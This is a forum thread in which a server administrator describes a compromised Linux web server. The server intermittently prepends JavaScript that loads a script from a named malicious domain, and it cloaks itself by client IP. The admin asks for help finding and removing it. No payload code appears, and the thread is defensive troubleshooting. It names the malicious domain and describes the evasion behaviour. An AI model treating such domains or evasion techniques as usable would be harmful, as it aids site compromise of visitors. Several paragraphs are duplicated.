asked on How to remove suspicious Javascript prepended on files under a Linux Server?
Hi, unfortunately our server www8.eonconnect.com seems to have been compromised with an exploit similar to this: http://blog.cpanel.net/?p=31
(even though it's not running cpanel, it seems similar)
For example if you run this at the commandline:
curl http://www8.eonconnect.com
you should get a blank html page page with no javascript (don't visit this with a browser)
But every 10th time or so, you get a malware script inserted at the top of the page.
Whatever it is, it hides itself well. If you run the following:
curl http://www8.eonconnect.com
from the server itself, you will get nothing unusual, it seems not to activate when accessed from its own ip.
But if from another machine you run that, you will get a javascript prepended, which loads a script from the domain wo94ni.cn . It seems to record ip addresses accessing it, so it will usually show the first time, and then you may have to rerun the curl command 10 or 20 times to see it again, and then after a certain number of times it will stop showing altogether for that client IP. We had 3 people in different locations spend a couple hours verifying this behavior yesterday.
In the article referenced or something linked from it, I read that it somehow loads itself into memory so that it can't be detected by checking for filesystem changes? Not sure how true that is, this is beyond my area of expertise. But we're sure that something is able to intermittently add a malicious javascript to web pages served from the server.
I installed 2 rootkit detectors, one called Rootkit HUnter and the other one Chrootkit, I'm attaching the log files if they are helpful at all.
Your help is really appreciated!
Thanks
rkhunter.txt
chrootkit.txt
(even though it's not running cpanel, it seems similar)
For example if you run this at the commandline:
curl http://www8.eonconnect.com
you should get a blank html page page with no javascript (don't visit this with a browser)
But every 10th time or so, you get a malware script inserted at the top of the page.
Whatever it is, it hides itself well. If you run the following:
curl http://www8.eonconnect.com
from the server itself, you will get nothing unusual, it seems not to activate when accessed from its own ip.
But if from another machine you run that, you will get a javascript prepended, which loads a script from the domain wo94ni.cn . It seems to record ip addresses accessing it, so it will usually show the first time, and then you may have to rerun the curl command 10 or 20 times to see it again, and then after a certain number of times it will stop showing altogether for that client IP. We had 3 people in different locations spend a couple hours verifying this behavior yesterday.
In the article referenced or something linked from it, I read that it somehow loads itself into memory so that it can't be detected by checking for filesystem changes? Not sure how true that is, this is beyond my area of expertise. But we're sure that something is able to intermittently add a malicious javascript to web pages served from the server.
I installed 2 rootkit detectors, one called Rootkit HUnter and the other one Chrootkit, I'm attaching the log files if they are helpful at all.
Your help is really appreciated!
Thanks
rkhunter.txt
chrootkit.txt
Linux DistributionsLinux SecurityApache Web Server
Last Comment
code4design
can you please post the malicious output of your curl command
ASKER
Hi ahoffmann, thanks for replying, we are making a couple more tests since when we found this thing we started strengthening our server ways of accessing it and our most common was ssh, it was using a password based authentication and I modified the config file a bit so its now key based and since that moment we have ran test scripts for this malicious script detection and is not coming up anymore, probably our password was compromised in someway and since now they dont have any keys they are not being able to access it anymore.
I'll inform you about anything that comes up between today and tomorrow, hopefully I've closed the door to that pesky script... :P
I'll inform you about anything that comes up between today and tomorrow, hopefully I've closed the door to that pesky script... :P
hmm, I don't understand what ssh has to do with your web server (except someone managed to login and install some malware)
ASKER
Yeah its really weird, but the behavior has been that, I'll keep you guys posted about any changes we see between today and tomorrow.
Thanks for replying!
P.S.
When I saw your reply I was about to post the response I sent to you, what I mean is that I wasn't going to forget about replying... ;)
Thanks for replying!
P.S.
When I saw your reply I was about to post the response I sent to you, what I mean is that I wasn't going to forget about replying... ;)
ASKER
Hi we haven't had any more incidences of this script up to this day but we are thinking on a OS restore since the server was compromised from the time we were getting that script which looked something like this anyway:
clean curl www8.eonconnect.com
with the script curl www8.eonconnect.com
Anyway.. the script doesn't matter in terms of what it exactly was since you wouldn't visit the appended link anyway.
Now the reason I replied with this is to see if anyone has seen this before and knows exactly what it was so you can orient me on how to verify that is not in our servers anymore or how to look for it if you have a previous experience with this and are certain that there is a big chance that is still inside and how to remove it, and all of this to see if we can avoid the OS restore which would be a big job for us in terms of customizations.
Your help is really appreciated
clean curl www8.eonconnect.com
with the script curl www8.eonconnect.com
Anyway.. the script doesn't matter in terms of what it exactly was since you wouldn't visit the appended link anyway.
Now the reason I replied with this is to see if anyone has seen this before and knows exactly what it was so you can orient me on how to verify that is not in our servers anymore or how to look for it if you have a previous experience with this and are certain that there is a big chance that is still inside and how to remove it, and all of this to see if we can avoid the OS restore which would be a big job for us in terms of customizations.
Your help is really appreciated
ASKER CERTIFIED SOLUTION
THIS SOLUTION ONLY AVAILABLE TO MEMBERS.
View this solution by signing up for a free trial.
Members can start a 7-Day free trial and enjoy unlimited access to the platform.